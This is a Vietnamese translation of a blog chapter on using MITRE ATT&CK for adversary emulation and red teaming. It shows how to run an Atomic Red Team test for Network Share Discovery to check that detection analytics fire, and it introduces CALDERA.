  1. MÔ PHỎNG ĐỐI THỦ VÀ RED TEAMING
    Blake Strom, Tim Schulz và Katie Nickels

Chúng tôi hy vọng bạn đã dành thời gian để đọc cả Chương 1 về việc bắt đầu sử dụng ATT&CK cho tình báo mối đe dọa và Chương 2 về việc sử dụng ATT&CK để phát hiện và phân tích! Chúng tôi ở đây để mang đến cho bạn chương thứ ba, lần này bao gồm mô phỏng đối thủ và red teaming với ATT&CK để minh họa cách chúng ta có thể kiểm tra các phân tích mới mà John đã chỉ cho chúng ta cách xây dựng.

Tiếp tục chủ đề của các chương trước, phần này sẽ được chia thành các cấp độ dựa trên mức độ tinh vi của nhóm của bạn và tài nguyên mà bạn có quyền truy cập:

  • Cấp độ 1 cho những người mới bắt đầu có thể không có nhiều tài nguyên
  • Cấp độ 2 cho các nhóm cấp trung bình bắt đầu trưởng thành
  • Cấp độ 3 cho các nhóm và tài nguyên an ninh mạng tiên tiến hơn

Đối với những người không quen thuộc với nó, mô phỏng đối thủ là một loại tham gia red team bắt chước một mối đe dọa đã biết đối với một tổ chức bằng cách kết hợp tình báo mối đe dọa để xác định các hành động và hành vi nào mà red team sử dụng. Đây là điều làm cho mô phỏng đối thủ khác với kiểm tra thâm nhập và các hình thức red teaming khác.

Người mô phỏng đối thủ xây dựng một kịch bản để kiểm tra một số khía cạnh nhất định của chiến thuật, kỹ thuật và quy trình (TTP) của đối thủ. Sau đó, red team tuân theo kịch bản trong khi hoạt động trên một mạng mục tiêu để kiểm tra xem các biện pháp phòng thủ có thể đối phó với đối thủ được mô phỏng như thế nào.

Vì ATT&CK là một cơ sở kiến thức lớn về hành vi đối thủ trong thế giới thực, nên không cần nhiều trí tưởng tượng để vẽ một mối liên hệ giữa hành vi của đối thủ hoặc red team và ATT&CK. Hãy khám phá cách các nhóm bảo mật có thể sử dụng ATT&CK để mô phỏng đối thủ nhằm giúp cải thiện tổ chức của họ.

CẤP ĐỘ 1
Các nhóm nhỏ và những người chủ yếu tập trung vào phòng thủ có thể nhận được rất nhiều lợi ích từ việc mô phỏng đối thủ ngay cả khi họ không có quyền truy cập vào một red team, vì vậy đừng lo lắng!

Có khá nhiều tài nguyên có sẵn để giúp đẩy nhanh việc kiểm tra phòng thủ của bạn bằng các kỹ thuật phù hợp với ATT&CK. Chúng tôi sẽ nêu bật cách bạn có thể nhúng chân vào mô phỏng đối thủ bằng cách thử các bài kiểm tra đơn giản.

Atomic Red Team, một dự án nguồn mở do Red Canary duy trì, là một bộ sưu tập các tập lệnh có thể được sử dụng để kiểm tra cách bạn có thể phát hiện một số kỹ thuật và quy trình được lập bản đồ với các kỹ thuật ATT&CK. Ví dụ: có thể bạn đã làm theo lời khuyên trong Chương 1 và xem xét các kỹ thuật được sử dụng bởi APT3 như Network Share Discovery (T1135). Nhóm tình báo của bạn đã chuyển điều này cho nhóm phát hiện của bạn và, theo hướng dẫn trong Chương 2, họ đã viết một phân tích hành vi để cố gắng phát hiện xem liệu một đối thủ có thực hiện kỹ thuật này hay không. Nhưng làm thế nào để bạn biết liệu bạn có thực sự phát hiện kỹ thuật đó hay không?

Atomic Red Team có thể được sử dụng để kiểm tra các kỹ thuật và quy trình riêng lẻ để xác minh rằng các phân tích hành vi và khả năng giám sát đang hoạt động như mong đợi.

Kho Atomic Red Team có nhiều bài kiểm tra atomic, mỗi bài có một thư mục chuyên dụng cho kỹ thuật ATT&CK được kiểm tra. Bạn có thể xem toàn bộ kho lưu trữ ở định dạng Ma trận ATT&CK.

Để bắt đầu thử nghiệm, hãy chọn trang T1135 để xem chi tiết và các loại bài kiểm tra atomic khác nhau được ghi lại. Mỗi bài kiểm tra này chứa thông tin về kỹ thuật là gì, các nền tảng được hỗ trợ và cách thực thi bài kiểm tra.

Chúng ta thấy có ba tùy chọn kiểm tra và quyết định chọn #2 để kiểm tra bằng dấu nhắc lệnh. Vì vậy, chúng ta mở dấu nhắc lệnh, sao chép và dán lệnh, thêm tên máy tính và thực thi lệnh.

Chúng ta vừa thực hiện bài kiểm tra atomic đầu tiên! Khi hoàn tất, chúng ta có thể xem lại để xem liệu những gì chúng ta mong đợi phát hiện có phải là những gì chúng ta thực sự phát hiện hay không. Ví dụ: có thể chúng ta có một phân tích hành vi trong công cụ SIEM sẽ cảnh báo khi “net view” được thực thi, nhưng chúng ta phát hiện ra nó không kích hoạt, vì vậy chúng ta tìm ra rằng các bản ghi không được xuất chính xác từ máy chủ của chúng ta. Bạn khắc phục sự cố và sửa lỗi, và bây giờ bạn đã có một cải tiến có thể đo lường để giúp bạn có cơ hội tốt hơn để bắt được một đối thủ sử dụng quy trình này trong tương lai.

Các bài kiểm tra riêng lẻ này cho phép tập trung vào từng kỹ thuật ATT&CK, giúp việc xây dựng phạm vi bảo hiểm phòng thủ dựa trên ATT&CK dễ tiếp cận hơn vì bạn có thể bắt đầu với một bài kiểm tra duy nhất cho một kỹ thuật duy nhất và mở rộng từ đó.

Nội dung thưởng cấp 1.5: Có một quy trình để sử dụng Atomic Red Team thực hiện kiểm tra mô phỏng đối thủ và sẵn sàng cho thứ gì đó có thể giúp kết hợp các chuỗi hành vi? Hãy xem xét CALDERA tiếp theo! CALDERA là một hệ thống mô phỏng đối thủ tự động do MITRE tạo ra có nhiều hành vi tích hợp sẵn được lập bản đồ với các kỹ thuật ATT&CK. (còn tiếp)


Bình luận

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *